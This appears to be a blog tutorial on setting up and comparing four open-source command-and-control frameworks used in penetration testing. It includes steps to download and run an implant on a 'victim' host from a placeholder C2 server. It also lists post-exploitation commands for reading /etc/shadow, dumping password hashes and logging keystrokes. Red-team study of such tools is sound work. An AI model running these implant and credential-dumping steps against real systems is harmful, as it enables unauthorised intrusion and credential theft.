C2 Frameworks are post-exploitation tools popular among pentesters and threat actors for managing affected hosts from a centralised location.

In this post I will walk through the following popular open-source C2 frameworks than I will compare them.

  • Posh C2
  • Deimos C2
  • Covenant
  • Mythic

Minimum requirements for the C2 server:

  • 1 vCPU
  • 1 GB of RAM
  • 15 GB of storage


Posh C2 is maintained by a cyber security consultant company called Nettitude [Link]. It allows teams to collaborate on a single server instances and keep all movements (commands and outputs) logged with timestamps and encrypted traffic even under HTTP.


Quick Installation on Kali

curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash

OR from the Kali repository

sudo apt install poshc2 -y

Quick Installation on Docker

sudo apt update && sudo apt install docker.io -y
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install-for-Docker.sh | sudo bash


Create a Project /var/poshc2/dft-c2/payloads/

posh-project -n dft-c2



Add the IP or Hostname of the C2

PayloadCommsHost: "https://c2.example.com"

Start Server manually


Start/Stop Server as a service


Note: many implants where compiled and placed at /var/poshc2/dft-c2/payloads where dft-c2 is the name of the project in this example. You can always go back to the quick start information by issuing cat /var/poshc2/dft-c2/quickstart.txt.


Start the ImplantHandler

posh -u userName

At this point an Implant has to be executed on the victim host. Hit enter to refresh this page until it appears.

After selecting the number of the connected Implant, try the following commands:

  • listmodules
  • get-computerinfo
  • get-ipconfig
  • get-userinfo
  • find-allvulns
  • invoke-arpscan
  • get-screenshot
  • get-keystrokes
    • Get-KeystrokeData


Deimos C2 is written in Go, and all its communicated is encrypted with an unique RSA key pair per listener. It has a multi user Web-UI with graphical maps and visual interaction with the listeners and agents (implants) [Link].


sudo apt install unzip -y 
unzip DeimosC2_linux.zip
chmod +x ./DeimosC2 && ./DeimosC2


Navigate to its public IP or hostname (e.g. https://c2.example.com:8443/).

Go to LISTENERS > Add Listener.

The selected Agents will be compiled automatically but they can always be generated on-demand.


The Agent binaries will be on the following path inside a directory with the respective Key (uuid format) of this listener.

cd ~/resources/listenerresources/3c1076cd-cc30-4b4e-960f-4498ceb72c82
python3 -m http.server 8080

Download and execute the Agent binary on the victim’s host:

wget http://c2.example.com:8080/HTTPSAgent_Lin_amd64_Intel
chmod +x HTTPSAgent_Lin_amd64_Intel

It will take a few seconds to get a connection back.

Try the following commands:

  • shell whoami
  • shell cat /etc/shadow
  • module shadowdump


Covenant is a another collaborative C2 framework that aims to highlight the attack surface of .NET [Link].


It is preferred to install the Docker version then having to install Dotnet core version 3.1 SDK.

git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant
sudo apt install docker.io -y
sudo docker build -t covenant .
sudo docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -d -v /FULL_PATH/Covenant/Covenant/Data:/app/Data covenant

Note: it requires the FULL_PATH to the directory where the configuration is located.


Navigate to https://c2.example.com:7443/ (replace the example hostname accordingly).

Go to Listeners > +Create.


docker start covenant
docker stop covenant
docker rm covenant


Mythic is cross-platform framework written in Go that runs in container, and can be managed via a friendly Web-UI and CLI [Link].

It will require more than 2 vCPU and 1 GB of RAM to run smoothly.


sudo apt update && sudo apt upgrade -y
sudo apt install docker.io gcc build-essential docker-compose docker-compose-plugin -y
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic
sudo make
cd Mythic
sudo ./mythic-cli start
cat Mythic/.env | grep MYTHIC_ADMIN_PASSWORD

Navigate to https://c2.example.com:7443/ (replace the example hostname accordingly).

Enter the default username mythic_admin and the password ramdomlly generated and places in the file Mythic/.env.

It contains a cyclopedia of documentation based on Mitre Attacks:


It is a great idea to add Agents and Profiles to the framework:

sudo ./mythic-cli install github https://github.com/MythicAgents/athena
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/basic_logger


  • Posh C2
    • Not much sophisticated,
    • Struggles with Python libraries and dependencies,
    • Available in Kali’s repository,
    • Super focused on Windows.
  • Deimos C2
    • Beautiful Web-UI but very unstable,
    • The Terminal feature is very slow because the agent is periodically polling the server for commands,
    • Easy deployment of Server and Agents with the compiled binaries.
  • Covenant
    • Stunning Web-UI,
    • The nomenclature of Launchers and Grunts is confusing,
    • Exclusive .NET focused.
  • Mythic
    • The most resources consumption and feature rich of the mentioned frameworks,
    • A wide variate of extensions/add-on to features,
    • Mitre Attack [Link] references a single click away is wonderful.